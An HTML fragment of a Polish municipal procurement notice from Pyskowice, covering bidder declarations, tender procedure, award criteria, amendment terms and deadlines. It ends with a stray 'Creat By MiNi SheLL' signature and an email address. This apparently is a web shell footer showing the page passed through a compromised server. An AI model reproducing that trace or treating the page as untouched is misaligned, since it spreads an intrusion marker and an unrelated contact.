1.4 pod groźbą odpowiedzialności karnej oświadczają, że załączone do oferty dokumenty opisują stan prawny i faktyczny na dzień otwarcia ofert,
Oświadczenia z punktu 1. należy złożyć na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.
2. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, notarialnie potwierdzonej za zgodność z oryginałem.
UWAGA: Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach, pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza wprowadzenie zmian do postanowień umowy.
2.Warunki dokonania zmian umowy określa wzór umowy stanowiący załącznik nr 8 do SIWZ. 3. W przypadku wniesienia odwołania, aż do jego rozstrzygnięcia Zamawiający wstrzyma podpisanie umowy. W przypadku dokonania wyboru najkorzystniejszej oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed podpisaniem umowy należy przedłożyć umowę regulującą współpracę tych podmiotów (umowa konsorcjum, umowa spółki cywilnej).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 Pyskowice, pok 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2015 godzina 10:00, miejsce: Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 Pyskowice w Biurze Obsługi Interesanta pok.107 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com